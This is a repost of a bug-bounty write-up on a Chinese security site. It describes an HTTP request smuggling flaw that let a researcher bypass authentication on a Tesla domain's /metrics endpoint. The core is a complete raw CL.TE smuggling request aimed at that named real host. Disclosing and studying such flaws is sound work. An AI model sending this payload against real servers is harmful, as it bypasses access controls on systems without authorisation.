api漏洞系列-通过请求走私绕过Authentication

admin
admin
admin
138674
文章
114
评论
2023年2月21日13:27:04评论51 views字数 737阅读2分27秒阅读模式

api漏洞系列-通过请求走私绕过Authentication

声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。

前言

这个漏洞是由 白帽小哥riramar 发现的,小哥发现特斯拉某个域名下服务容易受到HTTP请求走私的攻击,从而允许攻击者绕过前端安全控制。

POC(复现步骤)

当你访问https://apm.ap.tesla.services/metrics 时会返回 401(未经授权)。

api漏洞系列-通过请求走私绕过Authentication

通过使用 CLTE 有效负载执行下面的 Burp Intruder 攻击,攻击者可以绕过前端并访问https://apm.ap.tesla.services/metrics

注意:这里涉及到请求走私的相关知识

api漏洞系列-通过请求走私绕过Authentication
api漏洞系列-通过请求走私绕过Authentication
api漏洞系列-通过请求走私绕过Authentication
POST /?cb=906971031432954 HTTP/1.1
Transfer-Encoding : chunked
Host: apm.ap.tesla.services
Connection: keep-alive
ID: §0§
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.87 Safari/537.36
Content-type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 65

1
Z
0

GET /metrics HTTP/1.1
Host: apm.ap.tesla.services

0


原文始发于微信公众号(迪哥讲事):api漏洞系列-通过请求走私绕过Authentication

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年2月21日13:27:04
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   api漏洞系列-通过请求走私绕过Authenticationhttps://cn-sec.com/archives/1268265.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息